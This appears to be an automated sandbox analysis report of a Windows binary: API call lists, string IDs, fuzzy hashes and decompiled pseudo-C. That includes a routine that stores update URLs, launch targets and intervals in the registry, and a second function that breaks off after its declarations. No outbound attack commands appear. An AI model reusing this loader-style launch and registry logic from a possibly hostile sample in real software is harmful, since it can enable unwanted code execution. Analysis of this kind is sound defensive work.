                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                    • String ID: tRS
                                                                                                                                                                    • API String ID: 4104443479-3595970054
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
                                                                                                                                                                      • Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
                                                                                                                                                                      • Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                      • Part of subcall function 004EF8DA: std::exception::exception.LIBCMT ref: 004EF929
                                                                                                                                                                      • Part of subcall function 004EF8DA: std::exception::exception.LIBCMT ref: 004EF943
                                                                                                                                                                      • Part of subcall function 004EF8DA: __CxxThrowException@8.LIBCMT ref: 004EF954
                                                                                                                                                                      • Part of subcall function 004EF8DA: __FF_MSGBANNER.LIBCMT ref: 004EF968
                                                                                                                                                                      • Part of subcall function 004EF8DA: __NMSG_WRITE.LIBCMT ref: 004EF970
                                                                                                                                                                    • _memmove.LIBCMT ref: 004B275A
                                                                                                                                                                    Strings
                                                                                                                                                                    • CHECK failed: (&from) != (this): , xrefs: 004B23F9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalException@8SectionThrowstd::exception::exception$EnterLeave_malloc_memmove
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this):
                                                                                                                                                                    • API String ID: 1601740896-2589368188
                                                                                                                                                                    • Opcode ID: deff05450ebb7ee7bfe948b1855a44ba8481ef55cd88972ec92abb0ceb97e275
                                                                                                                                                                    • Instruction ID: 6d7382d96beb1b9424a9a212c8d0093b5115eefea9e15aba1a587c7fc64e1d67
                                                                                                                                                                    • Opcode Fuzzy Hash: deff05450ebb7ee7bfe948b1855a44ba8481ef55cd88972ec92abb0ceb97e275
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B42A2706047419FC324DF29C580A56BBF1BF89314F544A6EE48A87B62C774FC86CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    • CHECK failed: (&from) != (this): , xrefs: 004B56F9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterException@8LeaveThrow
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this):
                                                                                                                                                                    • API String ID: 3988633896-2589368188
                                                                                                                                                                    • Opcode ID: 5bb92ec0da22d61667b21993d2df67295b0444e698f7ad7ff4f25aea3605e916
                                                                                                                                                                    • Instruction ID: 216a5626e4c0b652a10bba10b68b46a91553d1cdf035d5c11d8e946078c574a7
                                                                                                                                                                    • Opcode Fuzzy Hash: 5bb92ec0da22d61667b21993d2df67295b0444e698f7ad7ff4f25aea3605e916
                                                                                                                                                                    • Instruction Fuzzy Hash: E4426C71608B419FC744DF29C480A56FBF5BF89314F648A6EE4498B352C734EC82CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    • CHECK failed: (&from) != (this): , xrefs: 004B6759
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterException@8LeaveThrow
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this):
                                                                                                                                                                    • API String ID: 3988633896-2589368188
                                                                                                                                                                    • Opcode ID: 992df3485e0b1def1ebeb7b097c81397ec0eb245c9064b28600f7a4e64883934
                                                                                                                                                                    • Instruction ID: 66f71b88159e772cda5679f90598184f7f95f81bb348ee80ca630f19e4c1f241
                                                                                                                                                                    • Opcode Fuzzy Hash: 992df3485e0b1def1ebeb7b097c81397ec0eb245c9064b28600f7a4e64883934
                                                                                                                                                                    • Instruction Fuzzy Hash: 5A429271608341DFC704DF29C480A56BBF5BF99314F658A6EE4498B352C738EC86CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    • CHECK failed: (&from) != (this): , xrefs: 004B36E9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterException@8LeaveThrow
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this):
                                                                                                                                                                    • API String ID: 3988633896-2589368188
                                                                                                                                                                    • Opcode ID: 8935fc10fc60426d63667ba3fc913394de2afc97727821328c0dec35622536f1
                                                                                                                                                                    • Instruction ID: 16a376be9b350538b311b1ed61255a0690ea3d5c6d5e655459e36613e5d8462c
                                                                                                                                                                    • Opcode Fuzzy Hash: 8935fc10fc60426d63667ba3fc913394de2afc97727821328c0dec35622536f1
                                                                                                                                                                    • Instruction Fuzzy Hash: B332C1B1604741DFC314CF6AC480A56BBF1BF89314F648A6EE48987762C734ED85CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    • CHECK failed: (&from) != (this): , xrefs: 00431669
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterException@8LeaveThrow
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this):
                                                                                                                                                                    • API String ID: 3988633896-2589368188
                                                                                                                                                                    • Opcode ID: 50c925ee3afea4493976cd1a307cd076d1118b4690078e1b96bec7db0ff4596c
                                                                                                                                                                    • Instruction ID: 1243531da4e44e2300a0c98a4ce86130b16687f280b8ad850037a72cfe222da1
                                                                                                                                                                    • Opcode Fuzzy Hash: 50c925ee3afea4493976cd1a307cd076d1118b4690078e1b96bec7db0ff4596c
                                                                                                                                                                    • Instruction Fuzzy Hash: 0D329E716047419FC714DF29C480A16BBF1BF9D314F14AA6EE5898B762C334EC86CB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004289A5
                                                                                                                                                                      • Part of subcall function 00405250: std::_Xinvalid_argument.LIBCPMT ref: 00405268
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$_malloc
                                                                                                                                                                    • String ID: list<T> too long
                                                                                                                                                                    • API String ID: 2877152494-4027344264
                                                                                                                                                                    • Opcode ID: 1241da44c5c531507161cd9dac542ca9e3c3926c53f69e78b333a84ae1efe53f
                                                                                                                                                                    • Instruction ID: 2c0a02a71642df0239427e5bd4fb3dceeead5c22c310ea855e706e07e5a496cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 1241da44c5c531507161cd9dac542ca9e3c3926c53f69e78b333a84ae1efe53f
                                                                                                                                                                    • Instruction Fuzzy Hash: 80C1CBB16053518FC720DF29C880A6FBBE5BF88704F44892EF9958B351DB38E945CB96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %05d$00000
                                                                                                                                                                    • API String ID: 0-3336089879
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCurrentOpenQueryUserValue
                                                                                                                                                                    • String ID: Extensions$LoadExtensions
                                                                                                                                                                    • API String ID: 3731316095-2899561765
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: d
                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00405250: std::_Xinvalid_argument.LIBCPMT ref: 00405268
                                                                                                                                                                    • CoCreateInstance.OLE32(005217DC,00000000,00000017,00535150,?,00000000,09D48295,?,00000000,00510528,000000FF,0043B1D9), ref: 004697CA
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateInstanceXinvalid_argumentstd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1179919883-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
• Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
• Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
• Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                                    			E004547A0(void* __edi) {
                                                                                                                                                                    				int _v4;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				char _v32;
                                                                                                                                                                    				void* _v36;
                                                                                                                                                                    				void* _v40;
                                                                                                                                                                    				void* _v44;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                    				char* _t101;
                                                                                                                                                                    				void* _t104;
                                                                                                                                                                    				void** _t135;
                                                                                                                                                                    				void* _t139;
                                                                                                                                                                    				void* _t152;
                                                                                                                                                                    				void* _t153;
                                                                                                                                                                    				void* _t157;
                                                                                                                                                                    				short* _t163;
                                                                                                                                                                    				short* _t170;
                                                                                                                                                                    				intOrPtr _t186;
                                                                                                                                                                    				void* _t190;
                                                                                                                                                                    				intOrPtr _t198;
                                                                                                                                                                    				void* _t199;
                                                                                                                                                                    				short* _t225;
                                                                                                                                                                    				short* _t226;
                                                                                                                                                                    				void* _t241;
                                                                                                                                                                    				void** _t244;
                                                                                                                                                                    				void* _t253;
                                                                                                                                                                    				void** _t254;
                                                                                                                                                                    				char _t256;
                                                                                                                                                                    				void* _t260;
                                                                                                                                                                    				signed int _t261;
                                                                                                                                                                    				void* _t263;
                                                                                                                                                                    				void* _t269;
                                                                                                                                                                    				void* _t270;
                                                                                                                                                                    				void* _t273;
                                                                                                                                                                    				void* _t274;
                                                                                                                                                                    
                                                                                                                                                                    				_t241 = __edi;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x50eae8);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t261 = _t260 - 0x20;
                                                                                                                                                                    				_t99 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t99 ^ _t261);
                                                                                                                                                                    				_t101 =  &_v12;
                                                                                                                                                                    				 *[fs:0x0] = _t101;
                                                                                                                                                                    				if( *((intOrPtr*)(__edi + 0xa4)) == 0) {
                                                                                                                                                                    					L28:
                                                                                                                                                                    					 *[fs:0x0] = _v12;
                                                                                                                                                                    					return _t101;
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *((intOrPtr*)(__edi + 4)) != 0) {
                                                                                                                                                                    					_t186 =  *((intOrPtr*)( *((intOrPtr*)(__edi + 4))));
                                                                                                                                                                    					_t230 =  *((intOrPtr*)(_t186 + 4));
                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t186 + 4))))();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t203 =  *((intOrPtr*)(_t241 + 0xa4));
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_t104 = E004546C0(L"version",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				_t263 = _t261 + 4;
                                                                                                                                                                    				if(_t104 == 0) {
                                                                                                                                                                    					_t244 =  *(_t241 + 0x18);
                                                                                                                                                                    					_t190 = _t244[0x11];
                                                                                                                                                                    					if(_t190 != 0) {
                                                                                                                                                                    						_push( *((intOrPtr*)(_t190 + 0x10)));
                                                                                                                                                                    						E004EF7B8();
                                                                                                                                                                    						_push(_t190);
                                                                                                                                                                    						L004EEDBE();
                                                                                                                                                                    						_t263 = _t263 + 8;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t231 = _t244[1];
                                                                                                                                                                    					_t244[0x11] = 0;
                                                                                                                                                                    					_v40 = 0;
                                                                                                                                                                    					if(RegCreateKeyExW( *_t244, _t244[1], 0, 0, 0, 0x20006, 0,  &_v40, 0) == 0) {
                                                                                                                                                                    						_t226 =  *0x55b1f4; // 0x534240
                                                                                                                                                                    						_t231 = _v40;
                                                                                                                                                                    						RegDeleteValueW(_v40, _t226);
                                                                                                                                                                    						RegCloseKey(_v40);
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t256 = _v44;
                                                                                                                                                                    					E004571A0(_t256,  &_v32, _t203, _t230, _t241);
                                                                                                                                                                    					_push(_t256);
                                                                                                                                                                    					_v4 = 0;
                                                                                                                                                                    					E004EF7B8();
                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                    					L00456F40(_t230,  *(_t241 + 0x18), 1);
                                                                                                                                                                    					_v12 = 0xffffffff;
                                                                                                                                                                    					_t231 = _v24;
                                                                                                                                                                    					_push(_v24);
                                                                                                                                                                    					E004EF7B8();
                                                                                                                                                                    					_t263 = _t263 + 8;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				E004546C0(L"url",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				L00456D70(_v44, 2, _t231,  *(_t241 + 0x18));
                                                                                                                                                                    				_push(_v44);
                                                                                                                                                                    				E004EF7B8();
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				E004546C0(L"description",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				L00456D70(_v44, 3, _v44,  *(_t241 + 0x18));
                                                                                                                                                                    				_push(_v44);
                                                                                                                                                                    				E004EF7B8();
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				E004546C0(L"about-url",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				L00456D70(_v44, 4,  &_v44,  *(_t241 + 0x18));
                                                                                                                                                                    				_push(_v44);
                                                                                                                                                                    				E004EF7B8();
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				E004546C0(L"launch-action",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				L00456D70(_v44, 5,  &_v44,  *(_t241 + 0x18));
                                                                                                                                                                    				_push(_v44);
                                                                                                                                                                    				E004EF7B8();
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				E004546C0(L"launch-target",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				L00456D70(_v44, 6, _v44,  *(_t241 + 0x18));
                                                                                                                                                                    				_push(_v44);
                                                                                                                                                                    				E004EF7B8();
                                                                                                                                                                    				_t135 =  *(_t241 + 0x18);
                                                                                                                                                                    				_t269 = _t263 + 0x28;
                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_t135[0xe] = 0;
                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                    				_t236 =  *_t135;
                                                                                                                                                                    				if(RegCreateKeyExW( *_t135, _t135[1], 0, 0, 0, 0x20006, 0,  &_v40, 0) == 0) {
                                                                                                                                                                    					if(_v36 == 0) {
                                                                                                                                                                    						_t170 =  *0x55b1e8; // 0x5342a8
                                                                                                                                                                    						RegDeleteValueW(_v40, _t170);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t225 =  *0x55b1e8; // 0x5342a8
                                                                                                                                                                    						RegSetValueExW(_v40, _t225, 0, 4,  &_v36, 4);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t236 = _v40;
                                                                                                                                                                    					RegCloseKey(_v40);
                                                                                                                                                                    				}
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_t139 = E004546C0(L"launch-target-size",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				_t270 = _t269 + 4;
                                                                                                                                                                    				if(_t139 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)(E004F11BC(6))) = 0;
                                                                                                                                                                    					_t157 = E004F36DC(_v44, 0, 0xa);
                                                                                                                                                                    					_t274 = _t270 + 0xc;
                                                                                                                                                                    					_t253 = _t157;
                                                                                                                                                                    					if( *((intOrPtr*)(E004F11BC(6))) == 0x22 || _t253 == 0) {
                                                                                                                                                                    						_t254 =  *(_t241 + 0x18);
                                                                                                                                                                    						_t199 = _t254[0x11];
                                                                                                                                                                    						if(_t199 != 0) {
                                                                                                                                                                    							_push( *((intOrPtr*)(_t199 + 0x10)));
                                                                                                                                                                    							E004EF7B8();
                                                                                                                                                                    							_push(_t199);
                                                                                                                                                                    							L004EEDBE();
                                                                                                                                                                    							_t274 = _t274 + 8;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t236 =  *_t254;
                                                                                                                                                                    						_t254[0x11] = 0;
                                                                                                                                                                    						_v36 = 0;
                                                                                                                                                                    						if(RegCreateKeyExW( *_t254, _t254[1], 0, 0, 0, 0x20006, 0,  &_v36, 0) == 0) {
                                                                                                                                                                    							_t163 =  *0x55b1f4; // 0x534240
                                                                                                                                                                    							RegDeleteValueW(_v36, _t163);
                                                                                                                                                                    							_t236 = _v36;
                                                                                                                                                                    							RegCloseKey(_v36);
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						L00456EB0( *(_t241 + 0x18), 1, _t253);
                                                                                                                                                                    					}
                                                                                                                                                                    					_push(_v44);
                                                                                                                                                                    					E004EF7B8();
                                                                                                                                                                    					_t270 = _t274 + 4;
                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				E004546C0(L"launch-parameter",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				L00456D70(_v44, 7, _t236,  *(_t241 + 0x18));
                                                                                                                                                                    				_push(_v44);
                                                                                                                                                                    				E004EF7B8();
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				E004546C0(L"signature",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				L00456D70(_v44, 9, _v44,  *(_t241 + 0x18));
                                                                                                                                                                    				_push(_v44);
                                                                                                                                                                    				E004EF7B8();
                                                                                                                                                                    				_push( &_v44);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_t152 = E004546C0(L"update-interval",  *((intOrPtr*)(_t241 + 0xa4)));
                                                                                                                                                                    				_t198 = _v44;
                                                                                                                                                                    				_t273 = _t270 + 0x14;
                                                                                                                                                                    				if(_t152 == 0) {
                                                                                                                                                                    					L26:
                                                                                                                                                                    					_t153 = 0x15180;
                                                                                                                                                                    					goto L27;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_push(_t198);
                                                                                                                                                                    					_t153 = L004F2D77();
                                                                                                                                                                    					_t273 = _t273 + 4;
                                                                                                                                                                    					if(_t153 < 0xe10 || _t153 > 0x93a80) {
                                                                                                                                                                    						goto L26;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						L27:
                                                                                                                                                                    						L00456EB0( *(_t241 + 0x18), 2, _t153);
                                                                                                                                                                    						_push(_t198);
                                                                                                                                                                    						_t101 = E004EF7B8();
                                                                                                                                                                    						_t261 = _t273 + 4;
                                                                                                                                                                    						goto L28;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}









































                                                                                                                                                                    0x00454a40
                                                                                                                                                                    0x00454a45
                                                                                                                                                                    0x00454a58
                                                                                                                                                                    0x00454a5a
                                                                                                                                                                    0x00454a5f
                                                                                                                                                                    0x00454a62
                                                                                                                                                                    0x00454a6c
                                                                                                                                                                    0x00454a82
                                                                                                                                                                    0x00454a85
                                                                                                                                                                    0x00454a8a
                                                                                                                                                                    0x00454a8f
                                                                                                                                                                    0x00454a90
                                                                                                                                                                    0x00454a95
                                                                                                                                                                    0x00454a96
                                                                                                                                                                    0x00454a9b
                                                                                                                                                                    0x00454a9b
                                                                                                                                                                    0x00454aa1
                                                                                                                                                                    0x00454ab4
                                                                                                                                                                    0x00454ab7
                                                                                                                                                                    0x00454ac3
                                                                                                                                                                    0x00454ac5
                                                                                                                                                                    0x00454ad0
                                                                                                                                                                    0x00454ad6
                                                                                                                                                                    0x00454adb
                                                                                                                                                                    0x00454adb
                                                                                                                                                                    0x00454a72
                                                                                                                                                                    0x00454a7b
                                                                                                                                                                    0x00454a7b
                                                                                                                                                                    0x00454ae5
                                                                                                                                                                    0x00454ae6
                                                                                                                                                                    0x00454aeb
                                                                                                                                                                    0x00454aee
                                                                                                                                                                    0x00454aee
                                                                                                                                                                    0x00454af6
                                                                                                                                                                    0x00454b02
                                                                                                                                                                    0x00454b16
                                                                                                                                                                    0x00454b1f
                                                                                                                                                                    0x00454b20
                                                                                                                                                                    0x00454b2f
                                                                                                                                                                    0x00454b35
                                                                                                                                                                    0x00454b39
                                                                                                                                                                    0x00454b4d
                                                                                                                                                                    0x00454b56
                                                                                                                                                                    0x00454b57
                                                                                                                                                                    0x00454b66
                                                                                                                                                                    0x00454b6c
                                                                                                                                                                    0x00454b70
                                                                                                                                                                    0x00454b75
                                                                                                                                                                    0x00454b79
                                                                                                                                                                    0x00454b7e
                                                                                                                                                                    0x00454b97
                                                                                                                                                                    0x00454b97
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00454b80
                                                                                                                                                                    0x00454b80
                                                                                                                                                                    0x00454b81
                                                                                                                                                                    0x00454b86
                                                                                                                                                                    0x00454b8e
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00454b9c
                                                                                                                                                                    0x00454b9c
                                                                                                                                                                    0x00454ba5
                                                                                                                                                                    0x00454baa
                                                                                                                                                                    0x00454bab
                                                                                                                                                                    0x00454bb0
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00454bb0
                                                                                                                                                                    0x00454b8e

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00020006,00000000,?,00000000,00000001,00454C09,?,?,?,?,00000001), ref: 00454880
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,00534240), ref: 00454896
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004548A1
                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 004549E1
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,005342A8,00000000,00000004,?,00000004), ref: 00454A07
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,005342A8), ref: 00454A1A
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00454A25
                                                                                                                                                                    • _wcstoul.LIBCMT ref: 00454A5A
                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00454ABB
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00534240,?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00454AD0
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00454ADB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$CloseCreateDelete$_wcstoul
                                                                                                                                                                    • String ID: @BS$about-url$description$launch-action$launch-parameter$launch-target$launch-target-size$signature$update-interval$url$version
                                                                                                                                                                    • API String ID: 1480302049-2771771197
                                                                                                                                                                    • Opcode ID: 960b6d2c93fc298d009a388e9c2ad43fab91a32960d43f95370bf528bea98839
                                                                                                                                                                    • Instruction ID: 404547cee46f91873dd8728ad4a98bac97951320d52ee59b3ed3a689a88e1261
                                                                                                                                                                    • Opcode Fuzzy Hash: 960b6d2c93fc298d009a388e9c2ad43fab91a32960d43f95370bf528bea98839
                                                                                                                                                                    • Instruction Fuzzy Hash: 2FC18BB5604745AFC300DF66D881A1BB7A9FF99309F00091EF9459B352D738F948CBAA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                    			E004492A0(unsigned int __ecx) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				short _v10;
                                                                                                                                                                    				short _v14;
                                                                                                                                                                    				short _v18;
                                                                                                                                                                    				short _v22;
                                                                                                                                                                    				short _v26;
                                                                                                                                                                    				short _v30;
                                                                                                                                                                    				char _v32;
                                                                                                                                                                    				short _v34;
                                                                                                                                                                    				short _v38;
                                                                                                                                                                    				short _v42;
                                                                                                                                                                    				short _v46;
                                                                                                                                                                    				short _v48;
                                                                                                                                                                    				struct tagLOGFONTW _v148;
                                                                                                                                                                    				WCHAR* _v152;
                                                                                                                                                                    				unsigned int _v156;
                                                                                                                                                                    				long _v160;
                                                                                                                                                                    				long _v164;
                                                                                                                                                                    				void* _v168;
                                                                                                                                                                    				void* _v180;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				signed int _t85;
                                                                                                                                                                    				int _t91;
                                                                                                                                                                    				void* _t93;
                                                                                                                                                                    				short _t99;
                                                                                                                                                                    				intOrPtr _t103;
                                                                                                                                                                    				intOrPtr _t104;
                                                                                                                                                                    				WCHAR* _t109;
                                                                                                                                                                    				int _t110;
                                                                                                                                                                    				long _t114;
                                                                                                                                                                    				struct HFONT__* _t118;
                                                                                                                                                                    				signed int _t122;
